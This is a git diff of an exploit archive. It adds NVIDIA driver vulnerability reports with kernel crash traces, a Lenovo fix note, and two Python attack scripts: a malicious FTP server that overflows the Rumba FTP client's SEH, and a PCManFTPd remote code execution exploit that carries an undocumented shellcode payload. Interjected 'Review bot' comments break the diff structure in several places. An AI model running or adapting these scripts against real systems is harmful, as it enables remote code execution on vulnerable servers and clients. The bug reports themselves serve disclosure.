+ffffd000`23f951f0 fffff800`c58e2bc6 : 00000000`000000f7 ffffd000`23f95270 000044dd`b2c37fec ffffbb22`4d3c8013 : nt!KeBugCheckEx+0x104
+ffffd000`23f95230 fffff800`c57ba4ce : ffffd000`23f95220 ffffe000`69a62000 00000000`00000001 00000000`07000014 : nvlddmkm+0x192bc6
+ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvlddmkm+0x6a4ce
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40667.zip
diff --git a/platforms/windows/dos/40668.txt b/platforms/windows/dos/40668.txt
new file mode 100755
index 000000000..d02975642
--- /dev/null
+++ b/platforms/windows/dos/40668.txt
@@ -0,0 +1,54 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=947
+
+The escape handler for 0x10000e9 lacks bounds checks, and passes a user
+specified size as the size to memcpy, resulting in a stack buffer overflow:
+
+bool escape_10000e9(NvMiniportDeviceContext *a1, Escape10000e9 *escape) {
+ ...
+ LOBYTE(a9) = escape_->unknown_5[1] != 0;
+ LOBYTE(a8) = escape_->unknown_5[0] != 0;
+ if ( !sub_DC57C(
+ *(_QWORD *)(*(_QWORD *)(v4 + 104) + 1000i64),
+ escape_->unknown_1,
+ escape_->unknown_2,
+ escape_->unknown_3,
+ escape_->unknown_4,
+ escape_->data,
+ escape_->size,
+ a8,
+ a9,
+ &escape_->unknown_5[2]) )
+ return 0;
+ escape_->header.result = 1;
+ return 1;
+}
+
+char sub_DC57C(...) {
+ ...
+ // escape_buf is escape_->data from previous function
+ // buf_size is escape->size
+ memcpy(&stack_buf, escape_buf, (unsigned int)buf_size);
+ ...
+
+Crashing context (Win 10 x64, 372.54):
+
+DRIVER_OVERRAN_STACK_BUFFER (f7)
+A driver has overrun a stack-based buffer. This overrun could potentially
+allow a malicious user to gain control of this machine.
+...
+
+STACK_TEXT:
+ffffd000`263bc188 fffff803`9d1deaf2 : 9d919d43`2d3cc8a7 00000000`000000f7 ffffd000`263bc2f0 fffff803`9d03c848 : nt!DbgBreakPointWithStatus
+ffffd000`263bc190 fffff803`9d1de4c3 : 00000000`00000003 ffffd000`263bc2f0 fffff803`9d16c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
+ffffd000`263bc1f0 fffff803`9d15fa44 : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc000`494d4764 : nt!KeBugCheck2+0x893
+ffffd000`263bc900 fffff800`ad8c2bc6 : 00000000`000000f7 9d919d43`2d3cc8a7 0000f6ec`74dc94fc ffff0913`8b236b03 : nt!KeBugCheckEx+0x104
+ffffd000`263bc940 fffff800`ad7fc6f7 : c0004492`55400400 ffff8000`00000000 ffffc000`44925540 00000000`00000000 : nvlddmkm+0x192bc6
+ffffd000`263bc980 ffffc000`585e78a0 : 00000000`000005d4 00430043`00310030 4666744e`03610107 00000000`00000000 : nvlddmkm+0xcc6f7
+ffffd000`263bce70 00000000`000005d4 : 00430043`00310030 4666744e`03610107 00000000`00000000 00000c48`01380702 : 0xffffc000`585e78a0
+ffffd000`263bce78 00430043`00310030 : 4666744e`03610107 00000000`00000000 00000c48`01380702 00010000`000166c2 : 0x5d4
+ffffd000`263bce80 4666744e`03610107 : 00000000`00000000 00000c48`01380702 00010000`000166c2 00000000`00000000 : 0x00430043`00310030
+ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 00000000`00000000 00000000`00000000 : 0x4666744e`03610107
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40668.zip
diff --git a/platforms/windows/local/40585.txt b/platforms/windows/local/40585.txt
index 89ae35af9..d262c0c27 100755
--- a/platforms/windows/local/40585.txt
+++ b/platforms/windows/local/40585.txt
@@ -53,3 +53,19 @@ EXAMPLE: Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted. + + +############################################################ + +From Lenovo PSIRT: + +This issue was fixed in version 3.0.44.0, which was released on June 4, 2013. README for Lenovo Communications Utility program: + +https://download.lenovo.com/pccbbs/mobiles/grcu19ww.txt + +3.0.44.0 01 2013/06/04 +<3.0.44.0> +- (Fix) Fixed the vulnerability issue of service program registration. +- (Fix) Fixed the issue that vcamsvc.exe might crash. +- (Fix) Fixed the issue that TpKnrres.exe might crash. +- (Fix) Fixed the issue that TPKNRSVC.exe might crash. diff --git a/platforms/windows/local/40655.txt b/platforms/windows/local/40655.txt new file mode 100755 index 000000000..793ac7bff --- /dev/null +++ b/platforms/windows/local/40655.txt 
@@ -0,0 +1,14 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880
+
+The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation for the input/output buffer and their sizes.
+
+In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0.
+
+This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver.
+
+A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40655.zip
diff --git a/platforms/windows/local/40660.txt b/platforms/windows/local/40660.txt
new file mode 100755
index 000000000..450f6d1d1
--- /dev/null
+++ b/platforms/windows/local/40660.txt
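Review bot: The 40655.txt entry opens with `/*` on its first line and never closes it within the 14 added lines, so anything that treats the header as a comment block sees it as unterminated; either drop the `/*` or add a closing `*/` after the description. The text attributes the arbitrary write to the driver using `Irp->UserBuffer` under `METHOD_BUFFERED`. It would make the root cause explicit to add that buffered I/O is expected to go through the system buffer (`Irp->AssociatedIrp.SystemBuffer`) with the sizes validated, since that is the check a driver author reading this needs to take away.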
@@ -0,0 +1,79 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=918
+
+The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
+process creation notification routine.
+
+In this particular routine,
+
+if ( cur->image_names_count > 0 ) {
+ // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
+ image_filename = info_->ImageFileName;
+ buf = image_filename->Buffer;
+ if ( buf )
+ {
+ if ( !v5 )
+ {
+ i = 0i64;
+ num_chars = image_filename->Length / 2;
+ // Look for the filename by scanning for backslash.
+ if ( num_chars )
+ {
+ while ( buf[num_chars - (unsigned int)i - 1] != '\\' )
+ {
+ i = (unsigned int)(i + 1);
+ if ( (unsigned int)i >= num_chars )
+ goto LABEL_39;
+ }
+ buf += num_chars - (unsigned __int64)(unsigned int)i;
+ }
+LABEL_39:
+ v26 = (unsigned int)i;
+ wcscpy_s((wchar_t *)Dst, i, buf);
+ Dst[v26] = 0;
+ wcslwr((wchar_t *)Dst);
+ v5 = 1;
+
+wcscpy_s is used incorrectly here, as the second argument is not the size of
+|Dst|, but rather the calculated size of the filename. |Dst| is a stack buffer
+that is at least 255 characters long. The the maximum component paths of most
+filesystems on Windows have a limit that is <= 255 though, so this shouldn't be
+an issue on normal filesystems.
+
+However, one can pass UNC paths to CreateProcessW containing forward slashes as
+the path delimiter, which means that the extracted filename here can be
+"a/b/c/...", leading to a buffer overflow. Additionally, this function has no
+stack cookie.
+
+e.g.
+
+CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\..../..../..../blah.exe", ...
+
+Crashing context with my PoC (Win 10 x64 with 372.54):
+
+NvStreamKms+0x1c6a:
+fffff801`5c791c6a c3 ret
+
+kd> dqs rsp
+ffffd000`25bc5d18 00410041`00410041
+
+kd> t
+
+...
+
+KMODE_EXCEPTION_NOT_HANDLED (1e)
+...
+FAULTING_IP:
+NvStreamKms+1c6a
+fffff800`5b1d1c6a c3 ret
+
+To reproduce, a WebDAV server is required (can be localhost), and the WebClient
+service needs to be started (start can be triggered by user without additional privileges).
+
+Then, run setup to create the long path to the target executable (you'll need to
+change the base directories), and then run poc_part1, and then poc_part2 (with
+the right UNC path) on the target machine.
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40660.zip
+
diff --git a/platforms/windows/remote/40651.py b/platforms/windows/remote/40651.py
new file mode 100755
index 000000000..3220dc6ae
--- /dev/null
+++ b/platforms/windows/remote/40651.py
@@ -0,0 +1,136 @@ +# Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307 +# Version: 4.x +# Tested on: Windows 7 +# CVE : CVE-2016-5764 + + + +1. Description + +Micro Focus Rumba FTP Client 4.x cannt handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution +on connected client. + +2. Proof of Concept + +The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH. + + +3. PoC Code + + +------------------- Server.py -------------------------- + + +import socket +import sys +import time + +# IP Address +IP = '127.0.0.1' \ + '' +# Create a TCP/IP socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Bind the socket to the port +server_address = (IP,21) +print "Starting up on %s port %s" % server_address +sock.bind(server_address) + +# Listen for incoming connections +sock.listen(1) + +# Wait for incoming connection +while True: + print "Waiting for a connection" + connection, client_address = sock.accept() + + try: + print "Connection from " + str(client_address) + # Receive the data in small chunks and restransmit it + connection.send("220 Welcome\r\n") + + while(True): + data = connection.recv(16) + print "received %s" % data + if "USER" in data: + print "Sending 331" + connection.send("331 Please specify the password.\r\n") + if "PASS" in data: + print "Sending 227" + connection.send("230 Login successful.\n\n") + if "PWD" in data: + print "Sending 257" + + # 77A632E2 add esp,908 pop pop pop ret + # THIS IS THE PART WHERE THE 
OVERFLOW HAPPENS + connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n") + if "TYPE A" in data: + print "Sending 200 Switching to ASCII mode." + connection.send("200 Switching to ASCII mode.\r\n") + if "TYPE I" in data: + print "Sending 200 Switching to Binary mode." + connection.send("200 200 Switching to Binary mode.\r\n") + if "SYST" in data: + print "Sending 215" + connection.send("215 UNIX Type: L8\r\n") + + if "SIZE" in data: + print "Sending 200" + connection.send("200 Switching to Binary mode. \r\n") + + if "FEAT" in data: + print "Sending 211-Features" + connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n") + if "CWD" in data: + print "Sending 250 Directory successfully changed." + connection.send("250 Directory successfully changed.\r\n") + + if "PASV" in str(data): + print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n" + connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n") + + # Listen on new socket for connection + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print 'Socket created' + + #Bind socket to local host and port + try: + s.bind((IP, 28599)) + except socket.error as msg: + print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] + sys.exit() + + print 'Socket bind complete for PASV on port 28599' + + #Start listening on socket + s.listen(10) + print 'Socket now listening on 28599' + + #now keep talking with the client + + #wait to accept a connection - blocking call + conn, addr = s.accept() + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + time.sleep(1) + print "Sending dir list" + connection.send("150 Here comes the directory listing.\r\n") + conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." 
+ "B"*500 + "\r\n") + + # Send ok to ftp client + connection.send("226 Directory send OK.\r\n") + + # close the connection + s.close() + conn.close() + break + + if "EXIT" in str(data): + print "REC" + connection.send("Have a nice day!\r\n") + break + finally: + connection.close() \ No newline at end of file diff --git a/platforms/windows/remote/40670.py b/platforms/windows/remote/40670.py new file mode 100755 index 000000000..60592f98c --- /dev/null +++ b/platforms/windows/remote/40670.py 
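Review bot: The `PASV` branch of 40651.py advertises a fixed public address, `227 Entering Passive Mode (130,161,45,252,111,183)`, while the data listener is bound to `IP` (`127.0.0.1`) on port 28599. A client under test is therefore told to open its data connection to an unrelated third-party host rather than to the lab listener. Deriving the reply from the bind address keeps the test traffic local: `connection.send("227 Entering Passive Mode (%s,111,183)\r\n" % IP.replace(".", ","))`. Separately, the lines from `1. Description` down to the `Server.py` rule are bare prose in a `.py` file and should be `#` comments.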
@@ -0,0 +1,45 @@ +from ftplib import FTP + +print ''' + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScrR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG +# Date: 2016.10.31 +# Exploit Author: Greg Priest +# Version: Pcmanftpd 2.0.7 +# Tested on: Windows 7 Enterprise x64 HUN/ENG +''' +ftp_ip = raw_input("FTP server IP:") +overflow = 'A' * 2005 +eip = '\xCA\x96\xC9\x76' + '\x90' * 10 +shellcode=( +"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + +"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + +"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + +"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + +"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + +"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + +"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + +"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + +"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + +"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + +"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + +"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + +"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + +"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + +"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + +"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + +"\xa5\x59\x50") +remotecode = overflow + eip + shellcode +ftp = FTP(ftp_ip) +ftp.login('anonymous', 'hacker@hacker.net') +print ftp.login +print ''' +Successfull Exploitation! +''' +FTP.delete(ftp, remotecode) +
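Review bot: The `shellcode` blob in 40670.py is committed with no statement of what it does or how it was produced, so anyone running this entry to confirm a fix executes an unreviewed payload on the target test machine. A header comment describing the payload's behaviour and its generator should accompany it, for example `# payload: <behaviour and generator, not stated on this page>`. The script also prints `Successfull Exploitation!` before `FTP.delete(ftp, remotecode)` is sent and regardless of the outcome, and `print ftp.login` prints the bound method rather than a server reply, so its output is not evidence either way when checking a patched server.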